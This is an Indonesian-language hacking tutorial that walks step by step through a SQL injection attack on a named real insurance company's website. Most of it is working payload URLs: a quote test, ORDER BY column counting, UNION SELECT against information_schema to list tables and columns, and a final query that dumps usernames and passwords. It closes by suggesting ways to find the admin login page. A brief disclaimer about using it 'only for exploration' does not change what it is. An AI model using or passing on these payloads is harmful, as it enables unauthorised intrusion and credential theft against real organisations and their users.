!!!!!!!!!!!!!!!!!!!!!
Dimohon agar mempergunakan cara2 yg ada di bawah ini dengan hati-hati. Pergunakan hanya dalam rangka eksplorasi, tidak untuk merusak !! Segala informasi yg di dapatkan dalam latihan ini di mohon tidak di publikasikan / dipergunakan / diperjualbelikan demi kepentingan pribadi !! :D
1
Untuk kasus uji coba kita coba link di bawah ini :
http://www.ceylinco-insurance.com/products.php?id=1
2
Untuk mengetahui situs tsb vulnerable atau tidak, coba kita sisipkan tanda (kutip) di akhir URL.
http://www.ceylinco-insurance.com/products.php?id=1 Bila muncul seperti ini :
3
untuk mencari banyak kolom yang digunakan database website tersebut kita menggunakan command ORDER BY. Cth :
http://www.ceylinco-insurance.com/products.php?id=-1 order by 1--
Atau
http://www.ceylinco-insurance.com/products.php?id=-1 order by 10/*
4
Menemukan ERROR ??
Jika belum maka kita tingkatkan ke kolom 2
http://www.ceylinco-insurance.com/products.php?id=-1 order by 2-Hingga seterusnya, sampai menemukan ERROR seperti ini :
5
Untuk melihat versi SQL database yang website itu gunakan :
http://www.ceylinco-insurance.com/products.php?id=1 union all select 1,2,3,4,5,6,7,8,9,10,11,12--
6
Rubah link sebelumnya sesuai dengan angka yg keluar di tahap 5 :
http://www.ceylinco-insurance.com/products.php?id=1 union all select 1,2,@@version,4,5,6,7,8,9,10,11,12 from information_schema.tables-karena yg muncul angka 3
7
Selanjutnya kita masuk ke tahap mencari nama tabel dan kolom :
http://www.ceylinco-insurance.com/products.php?id=-1 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()--
Lalu perhatikan deretan kata2 yg muncul !! Itu adalah nama2 tabel yg ada di dalam situs tsb..
8
kita ambil table user dan dapatkan kolom dari table user tersebut, tetapi table user ini kita convert dulu menggunakan hexa decimal (untuk caranya cari banyak ada di om gugle :p) :
http://www.ceylinco-insurance.com/products.php?id=-1 union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0x75736572-hasil convert hexadecimal dari tabel user
9
Setelah berhasil mendapatkan kolom dari tabel user maka, TIBALAH di tahap yg paling di tunggu2, MENDAPATKAN USERNAME dn PASSWORD ..!! :D
http://www.ceylinco-insurance.com/products.php?id=-1 union all select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12 from user--
Setelah dengan bangga mendapatka usernm dn passwrd, sekarang hanya tinggal mencari halmn adminny saja.. Bisa menggunakan tools : havij, aquanetix, dll atau dengan cara meraba2 halmn adminny, cth : /admin, /administrator, /admincp, dll
10